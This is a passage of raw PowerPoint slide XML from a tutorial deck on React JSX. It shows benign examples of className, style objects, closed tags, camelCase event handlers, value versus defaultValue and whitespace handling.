            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>SuccessComponent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>	return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>ErrorComponent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>};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100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Styling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10" y="673575"/>
            <a:ext cx="90400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// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>css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recentChangesTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>	background-color</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>: '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>FloralWhite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>',</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>	font-size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>: '19px'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//Now apply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render: function(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>return &lt;table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>className</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>recentChangesTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>'&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>&lt;Headings </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>headings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> = {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>this.props.headings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>} /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>&lt;Rows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>changeSets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> = {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>this.props.changeSets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>} /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>   &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>table&gt;;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>});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72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-13855" y="34567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-13855" y="32004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43346" y="3200400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0348" y="4027821"/>
            <a:ext cx="3575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But JSX is not HTML.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2230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“To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pass some custom attribute that does not exist in the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HTML specification, then React will simply ignore it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>// custom-attribute won't be rendered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>&lt;table custom-attribute = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>super_awesome_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>'&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>&lt;/table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>&gt;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"It must be passed as a data attribute so that React will render it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.“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// data-custom-attribute will be rendered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>&lt;table data-custom-attribute = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>super_awesome_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>'&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>&lt;/table&gt;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3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124692" y="673575"/>
            <a:ext cx="92686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/>
              <a:t>JavaScript XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>JSX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>) is an XML syntax that constructs the markup in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>React components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React </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>works without JSX, but using JSX makes it easy to read and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>write the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>React components as well as structure them just like any other HTML element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/>
              <a:t>JSX - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> XML syntax transform. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>write HTML-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" err="1"/>
              <a:t>ish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> tags in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>.</a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, what </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Instead of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>class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attributes (both reserved words in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ECMAScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>), you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>need to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>className</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlFor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NO-NO!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" b="1" dirty="0"/>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0"/>
              <a:t>em = &lt;em </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" b="1" dirty="0"/>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0"/>
              <a:t>="important" /&gt;;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label = &lt;label </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>thatInput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>/&gt;;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OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" b="1" dirty="0"/>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0"/>
              <a:t>em = &lt;em className="important" /&gt;;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label = &lt;label </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>htmlFor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>thatInput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>" /&gt;;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5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style </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is an object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>The style attribute takes an object value, not a ;-separated string. And the names </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>CSS properties are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" err="1"/>
              <a:t>camelCase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>, not dash-delimited.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NO-NO!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2700" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2700" b="1" dirty="0" smtClean="0"/>
              <a:t>  var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2700" dirty="0"/>
              <a:t>em = &lt;em style="font-size: 2em; line-height: 1.6" /&gt;;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2700" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>styles = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>{    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" err="1" smtClean="0"/>
              <a:t>fontSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>: '2em</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>',  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" err="1" smtClean="0"/>
              <a:t>lineHeight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>'1.6‘ };</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2700" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2700" b="1" dirty="0" smtClean="0"/>
              <a:t>    var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2700" dirty="0"/>
              <a:t>em = &lt;em style={styles} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2700" dirty="0" smtClean="0"/>
              <a:t>/&gt;;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pt-BR" sz="2700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2700" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// inline is also OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2700" i="1" dirty="0"/>
              <a:t>// note the double {{}} - one for dynamic value in JSX, one for JS object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1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= &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" err="1"/>
              <a:t>em</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t> style={{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" err="1"/>
              <a:t>fontSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>: '2em', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" err="1"/>
              <a:t>lineHeight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>: '1.6'}} /&gt;;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1695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Closing tags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>In HTML some tags don’t need to be closed, in JSX (XML) they do.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// NO-NO, unclosed tags, though fine in HTML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 err="1"/>
              <a:t>gimmeabreak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> = &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>&gt;;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" b="1" dirty="0"/>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0"/>
              <a:t>list = &lt;ul&gt;&lt;li&gt;item&lt;/ul&gt;;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/>
              <a:t>meta = &lt;meta charset="utf-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>"&gt;;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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dirty="0" err="1"/>
              <a:t>gimmeabreak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> = &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> /&gt;;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" b="1" dirty="0"/>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0"/>
              <a:t>list = &lt;ul&gt;&lt;li&gt;item&lt;/li&gt;&lt;/ul&gt;;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710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camelCase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> attributes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attributes in JSX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>need to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>camelCase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i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NO-NO!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dirty="0"/>
              <a:t>a = &lt;a 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reticulateSplines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>()" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>/&gt;;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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// OK</a:t>
            </a:r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dirty="0"/>
              <a:t>a = &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>onClick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>={</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>reticulateSplines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>} /&gt;;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17801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value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vs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defaultValue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In HTML if you have an &lt;input id="i" value="hello" /&gt; and then change the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>value by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>typing “bye”, then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>i.value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>// "bye"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>i.getAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>('value'); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>// "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>hello“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2800" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>In React, the value property will always have the up-to-date content of the text input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If you want to specify a default, you can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>defaultValue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en-US" sz="2700" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000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953000" y="5791200"/>
            <a:ext cx="1676400" cy="609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>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="27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0990"/>
            <a:ext cx="8423414" cy="310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1981200"/>
            <a:ext cx="632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700" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="27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981200"/>
            <a:ext cx="632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" y="6858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&lt;select&gt; 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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>use a &lt;select&gt; input in HTML, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>specify pre-selected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>entires</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> using &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>option </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>selected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6" y="1872877"/>
            <a:ext cx="769674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8039852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3870839" y="3224627"/>
            <a:ext cx="724174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682284"/>
            <a:ext cx="62198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7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Whitespace in JSX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Whitespace in JSX is similar to HTML but not quite.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>&lt;h1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>{1} plus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>2} is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>   {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>3}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>&lt;/h1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/>
              <a:t>results in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;h1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sv-SE" b="1" dirty="0"/>
              <a:t>&lt;span&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" b="1" dirty="0"/>
              <a:t>&lt;/span&gt;&lt;span&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>plus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" b="1" dirty="0"/>
              <a:t>&lt;/span&gt;&lt;span&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" b="1" dirty="0"/>
              <a:t>&lt;/span&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" b="1" dirty="0" smtClean="0"/>
              <a:t>span&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0" smtClean="0"/>
              <a:t>is     </a:t>
            </a:r>
            <a:r>
